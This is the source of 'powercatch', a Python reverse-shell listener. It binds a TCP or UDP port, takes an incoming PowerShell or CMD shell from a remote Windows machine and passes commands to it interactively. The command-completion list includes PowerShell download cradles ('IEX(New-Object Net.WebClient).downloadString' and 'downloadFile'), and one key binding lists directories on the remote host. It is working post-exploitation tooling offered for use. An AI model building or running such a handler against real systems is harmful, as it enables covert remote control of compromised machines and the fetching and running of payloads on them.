#!/usr/bin/python3
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.shortcuts import PromptSession, CompleteStyle, clear
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.application import Application
import sys
import socket
#import ssl
import re
from socket import MSG_DONTWAIT

commandsToComplete =    ['Add-BitsFile',
                        'Add-Computer',
                        'Add-Content',
                        'ac',
                        'Add-History',
                        'Add-JobTrigger',
                        'Add-Member',
                        'Add-PSSnapin',
                        'Add-Type',
                        'Checkpoint-Computer',
                        'Clear-Content',
                        'clc',
                        'Clear-EventLog',
                        'Clear-History',
                        'clhy',
                        'Clear-Item',
                        'cli',
                        'Clear-ItemProperty',
                        'clp',
                        'Clear-Recyclebin',
                        'Clear-Variable',
                        'clv',
                        'Compare-Object',
                        'compare, diff',
                        'Complete-BitsTransfer',
                        'Complete-Transaction',
                        'Compress-Archive',
                        'Configuration',
                        'Connect-PSSession',
                        'cnsn',
                        'Connect-WSMan',
                        'Convert-Path',
                        'cvpa',
                        'Convert-String',
                        'ConvertFrom-Csv',
                        'ConvertFrom-Json',
                        'ConvertFrom-SddlString',
                        'ConvertFrom-SecureString',
                        'ConvertFrom-String',
                        'CFS',
                        'ConvertFrom-StringData',
                        'ConvertTo-Csv',
                        'ConvertTo-Html',
                        'ConvertTo-Json',
                        'ConvertTo-SecureString',
                        'ConvertTo-Xml',
                        'Copy-Item',
                        'copy, cp, cpi',
                        'Copy-ItemProperty',
                        'cpp',
                        'Debug-Job',
                        'Debug-Process',
                        'Debug-Runspace',
                        'Disable-ComputerRestore',
                        'Disable-DscDebug',
                        'Disable-JobTrigger',
                        'Disable-NetworkSwitchEthernetPort',
                        'Disable-NetworkSwitchFeature',
                        'Disable-NetworkSwitchVlan',
                        'Disable-PSBreakpoint',
                        'dbp',
                        'Disable-PSRemoting',
                        'Disable-PSSessionConfiguration',
                        'Disable-PSTrace',
                        'Disable-PSWSManCombinedTrace',
                        'Disable-RunspaceDebug',
                        'Disable-ScheduledJob',
                        'Disable-WSManCredSSP',
                        'Disable-WSManTrace',
                        'Disconnect-PSSession',
                        'dnsn',
                        'Disconnect-WSMan',
                        'Enable-ComputerRestore',
                        'Enable-DscDebug',
                        'Enable-JobTrigger',
                        'Enable-NetworkSwitchEthernetPort',
                        'Enable-NetworkSwitchFeature',
                        'Enable-NetworkSwitchVlan',
                        'Enable-PSBreakpoint',
                        'ebp',
                        'Enable-PSRemoting',
                        'Enable-PSSessionConfiguration',
                        'Enable-PSTrace',
                        'Enable-PSWSManCombinedTrace',
                        'Enable-RunspaceDebug',
                        'Enable-ScheduledJob',
                        'Enable-WSManCredSSP',
                        'Enable-WSManTrace',
                        'Enter-PSHostProcess',
                        'Enter-PSSession',
                        'etsn',
                        'Exit-PSHostProcess',
                        'Exit-PSSession',
                        'exsn',
                        'Expand-Archive',
                        'Export-Alias',
                        'epal',
                        'Export-BinaryMiLog',
                        'Export-Clixml',
                        'Export-Console',
                        'Export-Counter',
                        'Export-Csv',
                        'epcsv',
                        'Export-FormatData',
                        'Export-ModuleMember',
                        'Export-ODataEndpointProxy',
                        'Export-PSSession',
                        'epsn',
                        'Find-DscResource',
                        'Find-Module',
                        'Find-Package',
                        'Find-PackageProvider',
                        'Find-Script',
                        'ForEach-Object',
                        '%, foreach',
                        'Format-Custom',
                        'fc',
                        'Format-Hex',
                        'fhx',
                        'Format-List',
                        'fl',
                        'Format-Table',
                        'ft',
                        'Format-Wide',
                        'fw',
                        'Get-Acl',
                        'Get-Alias',
                        'gal',
                        'Get-AppLockerFileInformation',
                        'Get-AppLockerPolicy',
                        'Get-AuthenticodeSignature',
                        'Get-BitsTransfer',
                        'Get-ChildItem',
                        'Get-CimAssociatedInstance',
                        'Get-CimClass',
                        'Get-CimInstance',
                        'Get-CimSession',
                        'Get-Clipboard',
                        'Get-CmsMessage',
                        'Get-Command',
                        'gcm',
                        'Get-ComputerRestorePoint',
                        'Get-Content',
                        'cat',
                        'Get-ControlPanelItem',
                        'Get-Counter',
                        'Get-Credential',
                        'Get-Culture',
                        'Get-Date',
                        'Get-DscConfiguration',
                        'Get-DscConfigurationStatus',
                        'Get-DscLocalConfigurationManager',
                        'Get-DscResource',
                        'Get-Event',
                        'Get-EventLog',
                        'Get-EventSubscriber',
                        'Get-ExecutionPolicy',
                        'Get-FileHash',
                        'Get-FormatData',
                        'Get-Help',
                        'Get-History',
                        'ghy',
                        'Get-Host',
                        'Get-HotFix',
                        'Get-InstalledModule',
                        'Get-InstalledScript',
                        'Get-IseSnippet',
                        'Get-Item',
                        'gi',
                        'Get-ItemProperty',
                        'gp',
                        'Get-ItemPropertyValue',
                        'gpv',
                        'Get-Job',
                        'gjb',
                        'Get-JobTrigger',
                        'Get-Location',
                        'gl',
                        'pwd',
                        'Get-LogProperties',
                        'Get-Member',
                        'gm',
                        'Get-Module',
                        'gmo',
                        'Get-NetworkSwitchEthernetPort',
                        'Get-NetworkSwitchFeature',
                        'Get-NetworkSwitchGlobalData',
                        'Get-NetworkSwitchVlan',
                        'Get-PSBreakpoint',
                        'gbp',
                        'Get-PSCallStack',
                        'gcs',
                        'Get-PSDrive',
                        'gdr',
                        'Get-PSHostProcessInfo',
                        'Get-PSProvider',
                        'Get-PSRepository',
                        'Get-PSSession',
                        'gsn',
                        'Get-PSSessionCapability',
                        'Get-PSSessionConfiguration',
                        'Get-PSSnapin',
                        'Get-Package',
                        'Get-PackageProvider',
                        'Get-PackageSource',
                        'Get-PfxCertificate',
                        'Get-Process',
                        'gps, ps',
                        'Get-Random',
                        'Get-Runspace',
                        'Get-RunspaceDebug',
                        'Get-ScheduledJob',
                        'Get-ScheduledJobOption',
                        'Get-Service',
                        'gsv',
                        'Get-TraceSource',
                        'Get-Transaction',
                        'Get-TroubleshootingPack',
                        'Get-TypeData',
                        'Get-UICulture',
                        'Get-Unique',
                        'gu',
                        'Get-Variable',
                        'gv',
                        'Get-WSManCredSSP',
                        'Get-WSManInstance',
                        'Get-WinEvent',
                        'Get-WmiObject',
                        'gwmi',
                        'Group-Object',
                        'group',
                        'Import-Alias',
                        'ipal',
                        'Import-BinaryMiLog',
                        'Import-Clixml',
                        'Import-Counter',
                        'Import-Csv',
                        'ipcsv',
                        'Import-IseSnippet',
                        'Import-LocalizedData',
                        'Import-Module',
                        'ipmo',
                        'Import-PSSession',
                        'ipsn',
                        'Import-PackageProvider',
                        'Import-PowerShellDataFile',
                        'Install-Module',
                        'Install-Package',
                        'Install-PackageProvider',
                        'Install-Script',
                        'Invoke-AsWorkflow',
                        'Invoke-CimMethod',
                        'Invoke-Command',
                        'icm',
                        'Invoke-DscResource',
                        'Invoke-Expression',
                        'iex',
                        'Invoke-History',
                        'ihy',
                        'Invoke-Item',
                        'ii',
                        'Invoke-RestMethod',
                        'irm',
                        'Invoke-TroubleshootingPack',
                        'Invoke-WSManAction',
                        'Invoke-WebRequest',
                        'curl',
                        'iwr',
                        'wget',
                        'Invoke-WmiMethod',
                        'Join-Path',
                        'Limit-EventLog',
                        'Measure-Command',
                        'Measure-Object',
                        'measure',
                        'Move-Item',
                        'mi',
                        'move',
                        'mv',
                        'Move-ItemProperty',
                        'mp',
                        'New-Alias',
                        'nal',
                        'New-AppLockerPolicy',
                        'New-CimInstance',
                        'New-CimSession',
                        'New-CimSessionOption',
                        'New-DscChecksum',
                        'New-Event',
                        'New-EventLog',
                        'New-Guid',
                        'New-IseSnippet',
                        'New-Item',
                        'ni',
                        'New-ItemProperty',
                        'New-JobTrigger',
                        'New-Module',
                        'nmo',
                        'New-ModuleManifest',
                        'New-NetworkSwitchVlan',
                        'New-Object',
                        'New-PSDrive',
                        'mount',
                        'ndr',
                        'New-PSRoleCapabilityFile',
                        'New-PSSession',
                        'nsn',
                        'New-PSSessionConfigurationFile',
                        'npssc',
                        'New-PSSessionOption',
                        'New-PSTransportOption',
                        'New-PSWorkflowExecutionOption',
                        'New-PSWorkflowSession',
                        'New-ScheduledJobOption',
                        'New-ScriptFileInfo',
                        'New-Service',
                        'New-TemporaryFile',
                        'New-TimeSpan',
                        'New-Variable',
                        'nv',
                        'New-WSManInstance',
                        'New-WSManSessionOption',
                        'New-WebServiceProxy',
                        'New-WinEvent',
                        'Out-Default',
                        'Out-File',
                        'Out-GridView',
                        'ogv',
                        'Out-Host',
                        'oh',
                        'Out-Null',
                        'Out-Printer',
                        'lp',
                        'Out-String',
                        'Pop-Location',
                        'popd',
                        'Protect-CmsMessage',
                        'Publish-DscConfiguration',
                        'Publish-Module',
                        'Publish-Script',
                        'Push-Location',
                        'pushd',
                        'Read-Host',
                        'Receive-Job',
                        'rcjb',
                        'Receive-PSSession',
                        'rcsn',
                        'Register-ArgumentCompleter',
                        'Register-CimIndicationEvent',
                        'Register-EngineEvent',
                        'Register-ObjectEvent',
                        'Register-PSRepository',
                        'Register-PSSessionConfiguration',
                        'Register-PackageSource',
                        'Register-ScheduledJob',
                        'Register-WmiEvent',
                        'Remove-BitsTransfer',
                        'Remove-CimInstance',
                        'Remove-CimSession',
                        'Remove-Computer',
                        'Remove-DscConfigurationDocument',
                        'Remove-Event',
                        'Remove-EventLog',
                        'Remove-Item',
                        'del',
                        'erase',
                        'rd',
                        'ri',
                        'rm',
                        'rmdir',
                        'Remove-ItemProperty',
                        'rp',
                        'Remove-Job',
                        'rjb',
                        'Remove-JobTrigger',
                        'Remove-Module',
                        'rmo',
                        'Remove-NetworkSwitchEthernetPortIPAddress',
                        'Remove-NetworkSwitchVlan',
                        'Remove-PSBreakpoint',
                        'rbp',
                        'Remove-PSDrive',
                        'rdr',
                        'Remove-PSSession',
                        'rsn',
                        'Remove-PSSnapin',
                        'rsnp',
                        'Remove-TypeData',
                        'Remove-Variable',
                        'rv',
                        'Remove-WSManInstance',
                        'Remove-WmiObject',
                        'Rename-Computer',
                        'Rename-Item',
                        'ren',
                        'rni',
                        'Rename-ItemProperty',
                        'rnp',
                        'Reset-ComputerMachinePassword',
                        'Resolve-Path',
                        'rvpa',
                        'Restart-Computer',
                        'Restart-Service',
                        'Restore-Computer',
                        'Restore-DscConfiguration',
                        'Restore-NetworkSwitchConfiguration',
                        'Resume-BitsTransfer',
                        'Resume-Job',
                        'rujb',
                        'Resume-Service',
                        'Save-Help',
                        'Save-Module',
                        'Save-NetworkSwitchConfiguration',
                        'Save-Package',
                        'Save-Script',
                        'Select-Object',
                        'select',
                        'Select-String',
                        'sls',
                        'Select-Xml',
                        'Send-MailMessage',
                        'Set-Acl',
                        'Set-Alias',
                        'sal',
                        'Set-AppLockerPolicy',
                        'Set-AuthenticodeSignature',
                        'Set-BitsTransfer',
                        'Set-CimInstance',
                        'Set-Clipboard',
                        'Set-Content',
                        'sc',
                        'Set-Date',
                        'Set-DscLocalConfigurationManager',
                        'Set-ExecutionPolicy',
                        'Set-Item',
                        'si',
                        'Set-ItemProperty',
                        'sp',
                        'Set-JobTrigger',
                        'Set-Location',
                        'cd',
                        'chdir',
                        'sl',
                        'Set-LogProperties',
                        'Set-NetworkSwitchEthernetPortIPAddress',
                        'Set-NetworkSwitchPortMode',
                        'Set-NetworkSwitchPortProperty',
                        'Set-NetworkSwitchVlanProperty',
                        'Set-PSBreakpoint',
                        'sbp',
                        'Set-PSDebug',
                        'Set-PSRepository',
                        'Set-PSSessionConfiguration',
                        'Set-PackageSource',
                        'Set-ScheduledJob',
                        'Set-ScheduledJobOption',
                        'Set-Service',
                        'Set-StrictMode',
                        'Set-TraceSource',
                        'Set-Variable',
                        'set',
                        'sv',
                        'Set-WSManInstance',
                        'Set-WSManQuickConfig',
                        'Set-WmiInstance',
                        'Show-Command',
                        'shcm',
                        'Show-ControlPanelItem',
                        'Show-EventLog',
                        'Sort-Object',
                        'sort',
                        'Split-Path',
                        'Start-BitsTransfer',
                        'Start-DscConfiguration',
                        'Start-Job',
                        'sajb',
                        'Start-Process',
                        'saps',
                        'start',
                        'Start-Service',
                        'sasv',
                        'Start-Sleep',
                        'sleep',
                        'Start-Trace',
                        'Start-Transaction',
                        'Start-Transcript',
                        'Stop-Computer',
                        'Stop-DscConfiguration',
                        'Stop-Job',
                        'spjb',
                        'Stop-Process',
                        'kill',
                        'spps',
                        'Stop-Service',
                        'spsv',
                        'Stop-Trace',
                        'Stop-Transcript',
                        'Suspend-BitsTransfer',
                        'Suspend-Job',
                        'sujb',
                        'Suspend-Service',
                        'Tee-Object',
                        'tee',
                        'Test-AppLockerPolicy',
                        'Test-ComputerSecureChannel',
                        'Test-Connection',
                        'Test-DscConfiguration',
                        'Test-ModuleManifest',
                        'Test-PSSessionConfigurationFile',
                        'Test-Path',
                        'Test-ScriptFileInfo',
                        'Test-WSMan',
                        'Trace-Command',
                        'trcm',
                        'Unblock-File',
                        'Undo-Transaction',
                        'Uninstall-Module',
                        'Uninstall-Package',
                        'Uninstall-Script',
                        'Unprotect-CmsMessage',
                        'Unregister-Event',
                        'Unregister-PSRepository',
                        'Unregister-PSSessionConfiguration',
                        'Unregister-PackageSource',
                        'Unregister-ScheduledJob',
                        'Update-DscConfiguration',
                        'Update-DscConfiguration',
                        'Update-FormatData',
                        'Update-Help',
                        'Update-List',
                        'Update-Module',
                        'Update-ModuleManifest',
                        'Update-Script',
                        'Update-ScriptFileInfo',
                        'Update-TypeData',
                        'Use-Transaction',
                        'Wait-Debugger',
                        'Wait-Event',
                        'Wait-Job',
                        'wjb',
                        'Wait-Process',
                        'Where-Object',
                        '?',
                        'where',
                        'Write-Debug',
                        'Write-Error',
                        'Write-EventLog',
                        'Write-Host',
                        'Write-Information',
                        'Write-Output',
                        'echo',
                        'write',
                        'Write-Progress',
                        'Write-Verbose',
                        'Write-Warning',
                        'addusers',
                        'admodcmd',
                        'arp',
                        'assoc',
                        'attrib',
                        'bcdboot',
                        'bcdedit',
                        'bitsadmin',
                        'browstat',
                        'cacls',
                        'call',
                        'certreq',
                        'certutil',
                        'cd',
                        'change',
                        'chcp',
                        'chkdsk',
                        'chkntfs',
                        'choice',
                        'cipher',
                        'cleanmgr',
                        'clip',
                        'cls',
                        'cmd',
                        'cmdkey',
                        'color',
                        'comp',
                        'compact',
                        'compress',
                        'convert',
                        'copy',
                        'coreinfo',
                        'csccmd',
                        'csvde',
                        'date',
                        'defrag',
                        'del',
                        'delprof',
                        'deltree',
                        'devcon',
                        'dir',
                        'diruse',
                        'diskpart',
                        'diskshadow',
                        'diskuse',
                        'dism',
                        'dnscmd',
                        'doskey',
                        'driverquery',
                        'dsacls',
                        'dsadd',
                        'user',
                        'group',
                        'computer',
                        'dsget',
                        'user',
                        'group',
                        'computer',
                        'dsquery',
                        'user',
                        'group',
                        'computer',
                        'dsmod',
                        'user',
                        'group',
                        'computer',
                        'dsmove',
                        'dsrm',
                        'echo',
                        'endlocal',
                        'erase',
                        'eventcreate',
                        'exit',
                        'expand',
                        'explorer',
                        'extract',
                        'fc',
                        'find',
                        'findstr',
                        'fltmc',
                        'for',
                        'for /f',
                        'forfiles',
                        'format',
                        'freedisk',
                        'fsutil',
                        'ftp',
                        'ftype',
                        'getmac',
                        'goto',
                        'gpresult',
                        'gpupdate',
                        'help',
                        'hostname',
                        'icacls',
                        'iexpress',
                        'if',
                        'ifmember',
                        'ipconfig',
                        'inuse',
                        'label',
                        'lgpo',
                        'lodctr',
                        'logman',
                        'logoff',
                        'logtime',
                        'makecab',
                        'mapisend',
                        'mbsacli',
                        'mem',
                        'md',
                        'mklink',
                        'mode',
                        'more',
                        'mountvol',
                        'move',
                        'moveuser',
                        'msg',
                        'msiexec',
                        'msinfo32',
                        'mstsc',
                        'net',
                        'netdom',
                        'netsh',
                        'nbtstat',
                        'netstat',
                        'locale',
                        'nltest',
                        'now',
                        'nslookup',
                        'ntbackup',
                        'ntdsutil',
                        'ntrights',
                        'nvspbind',
                        'openfiles',
                        'path',
                        'pathping',
                        'pause',
                        'perms',
                        'perfmon',
                        'ping',
                        'popd',
                        'portqry',
                        'powercfg',
                        'print',
                        'printbrm',
                        'prncnfg',
                        'prnmngr',
                        'procdump',
                        'prompt',
                        'psexec',
                        'psfile',
                        'psgetsid',
                        'psinfo',
                        'pskill',
                        'pslist',
                        'psloggedon',
                        'psloglist',
                        'pspasswd',
                        'psping',
                        'psservice',
                        'psshutdown',
                        'pssuspend',
                        'pushd',
                        'qgrep',
                        'query process',
                        'qprocess',
                        'query session',
                        'qwinsta',
                        'query termserver',
                        'qappsrv',
                        'query user',
                        'quser',
                        'rasdial',
                        'rasphone',
                        'rd',
                        'recover',
                        'reg',
                        'regedit',
                        'regsvr32',
                        'regini',
                        'rem',
                        'ren',
                        'replace',
                        'reset session',
                        'rmtshare',
                        'robocopy',
                        'route',
                        'run',
                        'start',
                        'runas',
                        'rundll32',
                        'sc',
                        'schtasks',
                        'set',
                        'setlocal',
                        'setspn',
                        'setx',
                        'sfc',
                        'share',
                        'shellrunas',
                        'shift',
                        'shortcut',
                        'shutdown',
                        'sigcheck',
                        'sleep',
                        'slmgr',
                        'sort',
                        'start',
                        'strings',
                        'subinacl',
                        'subst',
                        'sysmon',
                        'systeminfo',
                        'takeown',
                        'tasklist',
                        'taskkill',
                        'telnet',
                        'time',
                        'timeout',
                        'title',
                        'tlist',
                        'touch',
                        'tracert',
                        'tree',
                        'tsdiscon',
                        'tskill',
                        'type',
                        'typeperf',
                        'tzutil',
                        'ver',
                        'verify',
                        'vmconnect',
                        'vol',
                        'vssadmin',
                        'w32tm',
                        'waitfor',
                        'wbadmin',
                        'wecutil',
                        'wevtutil',
                        'where',
                        'whoami',
                        'windiff',
                        'winrm',
                        'winrs',
                        'wmic',
                        'wpeutil',
                        'wpr',
                        'wusa',
                        'wuauclt',
                        'xcacls',
                        'xcopy',
                        'IEX',
                        'IEX(New-Object Net.WebClient).downloadString("http',
                        '(New-Object System.Net.WebClient).downloadFile("http',
                        'exit',
                        'quit',
                        'clear',
                        'cls',
                        'Get-PSReadLineOption',
                        'System',
                        'System.Net.WebClient',
                        'System.Management.Automation.PSCredential(',
                        '[environment]::Is64BitOperatingSystem',
                        '[environment]::Is64BitProcess',
                        '[environment]',
                        '$ExecutionContext.SessionState.LanguageMode',
                        'PowerHelp',
                        ]
powershell_commands = WordCompleter(commandsToComplete,
                                    ignore_case=True,
                                    sentence=True)


def usage():
    print("usage: powercatch <port_to_listen>")
    print("   eg: powercatcher 8001")
    sys.exit(1)

def powercatch_help():
    print("\nCommands:")
    print("  PowerHelp              Display this menu")
    print("  clear                  Clear the screen")
    print("  cls                    Clear the screen")
    print("  exit                   Use exit command if you are in nested shell eg: if you called cmd within powershell")
    print("  quit                   Quits program")
    print("\nKey Combinations:")
    print("  Ctrl + \\               For Directory completion (Makes a directory request on each key-combination press)")
    print("                         eg: PS > dir -Force <Ctrl + \\>")
    print("  Ctrl + c               Cancels command so that you can try again")
    print("  Ctrl + d               Quits program")
    print("\nFuture Commands To be Implemented:")
    print("  PowerDownload          Download remote file eg: PowerDownload <remote_dir> <local_dir>")
    print("  PowerUpload            Upload local file eg: PowerUpload <local_dir> <remote_dir>")
    print()

CurrentWorkingDirectory = ''
CurrentShell = ''
UDPRemoteAddr = ""
UDPRemoteAddrRecv = False

def receive_data(conn, udp):
    global CurrentWorkingDirectory
    global CurrentShell
    global UDPRemoteAddr
    global UDPRemoteAddrRecv
    output = ""
    try:
        while True:
            if (UDPRemoteAddrRecv == False) and (udp):
                UDPRemoteAddrRecv = True
                response, UDPRemoteAddr = conn.recvfrom(1024)
                print('[*] Accepted connection from {} on port {}'.format(UDPRemoteAddr[0], UDPRemoteAddr[1]))
            else:
                response = conn.recv(1024)
            output += response.decode()
            # use a regex to find any "[a-zA-Z]:*>" this will include cmd
            found = re.search("[a-zA-Z]:.*>", output)
            if found:
                CurrentWorkingDirectory = output[found.start():found.end()-1]
                if output[found.start()-3:][:3] == "PS ":
                    CurrentShell = 'PowerShell'
                    print("%s" % (output[:found.start()-3]))
                    return output[found.start()-3:found.end()]
                else:
                    CurrentShell = 'CMD'
                    print("%s" % (output[:found.start()]))
                    return output[found.start():found.end()]
    except KeyboardInterrupt:
        return "PS >"
    except EOFError:
        conn.close()
        sys.exit(1)
    except BaseException:
        return "PS >"

def append_dir_list(conn, dir_req):
    global CurrentShell
    directories = []
    output = ""
    command = ""
    dirReqFound = re.search("[\\.\\\\]*", dir_req)
    if dirReqFound is not None:
        if (dirReqFound.end()-dirReqFound.start()) == dir_req.__len__():
            dir_prefix = dir_req
        else:
            dir_prefix = "\\"
    elif dir_req == "..\\":
        dir_prefix = "..\\"
    elif dir_req == ".\\":
        dir_prefix = ".\\"
    else:
        dir_prefix = "\\"
    try:
        if CurrentShell == "PowerShell":
            command = "dir -Force \"%s\" | Select-Object Name\n" % dir_req
        elif CurrentShell == "CMD":
            command = "powershell -c \"dir -Force \"%s\" | Select-Object Name\"\n" % dir_req
        # Get directories
        conn.send(str.encode(command))
        while True:
            response = conn.recv(1024)
            output += response.decode()
            found = re.search("[a-zA-Z]:.*>", output)
            if found:
                dirStart = re.search("----", output)
                output = output[dirStart.start():]
                # skip one line
                output = output[output.find("\n")+1:]
                for cur_dir in output.splitlines():
                    if cur_dir == "":
                        break
                    directories.append(dir_prefix + cur_dir.rstrip())
                return directories
    except:
        pass

def interactive_shell(port, proto):
    global CurrentShell
    global powershell_commands
    global commandsToComplete
    global UDPRemoteAddr
    udp = False
    bindings = KeyBindings()

    @bindings.add('c-\\')
    def _(event):
        app = event.app.current_buffer
        # simple directory matching all directory attempts must follow a whitespace
        dirFound = re.search(".+\\s+[\\.\\\\]", app.text)
        if dirFound is not None:
            test_dir = app.text[dirFound.end()-1:]
            if (test_dir.startswith(".")) or (test_dir.startswith("\\")):
                dir_req = test_dir
        else:
            dir_req = ".\\"
        try:
            powershell_commands.words = append_dir_list(conn, dir_req)
            if powershell_commands.words is not None:
                powershell_commands.sentence = False
                app.start_completion(select_first=False)
            powershell_commands.sentence = True
            powershell_commands.words = commandsToComplete
        except:
            pass

    print("[*] listening on 0.0.0.0:%d" % port)
    if proto == "tcp":
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("0.0.0.0", port))
        s.listen(1)
        conn, addr = s.accept()
        prompt = receive_data(conn, udp)
        print('[*] Accepted connection from {} on port {}'.format(addr[0], addr[1]))
    # add udp support
    # udp does not support accept ... s.recvfrom after bind
    elif proto == "udp":
        udp = True
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.bind(("0.0.0.0", port))
        conn = s
        prompt = receive_data(conn, udp)
    history = InMemoryHistory()
    session = PromptSession(completer=powershell_commands,
                            history=history,
                            auto_suggest=AutoSuggestFromHistory(),
                            mouse_support=True,
                            validate_while_typing=True,
                            complete_while_typing=True,
                            #complete_style=CompleteStyle.READLINE_LIKE,
                            search_ignore_case=True)
    while True:
        try:
            command = session.prompt(message="%s " % prompt, key_bindings=bindings)
        except KeyboardInterrupt:
            continue  # Control-C, try again.
        except EOFError:
            conn.close()
            s.close()
            break  # Control-D, kill session.
        if len(command) <= 0:
            continue
        with s:
            if (command == "PowerHelp"):
                powercatch_help()
                continue
            elif (command == "clear") or (command == "cls"):
                clear()
                continue
            elif (command.lower() == "quit"):
                conn.close()
                s.close()
                sys.exit()
            if command[-1:] != "\n":
                command += "\n"
            if udp:
                conn.sendto(str.encode(command), UDPRemoteAddr)
                prompt = receive_data(conn, udp)
            else:
                conn.send(str.encode(command))
                prompt = receive_data(conn, udp)

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
    try:
        if not (int(sys.argv[1]) <= 65535 and int(sys.argv[1]) >= 1):
            print("[X] Port must be a number between 1-65535")
            usage()
    except ValueError as e:
        print("[X] Port must be a number between 1-65535")
        usage()
    if len(sys.argv) == 2:
        proto = "tcp"
    if len(sys.argv) == 3:
        # UDP must be correctly implemented. Once done sys.argv[2] == "udp"
        if (sys.argv[2] == "tcp") or (sys.argv[2] == "udp"):
            proto = sys.argv[2]
        else:
            usage()

    interactive_shell(int(sys.argv[1]), proto)
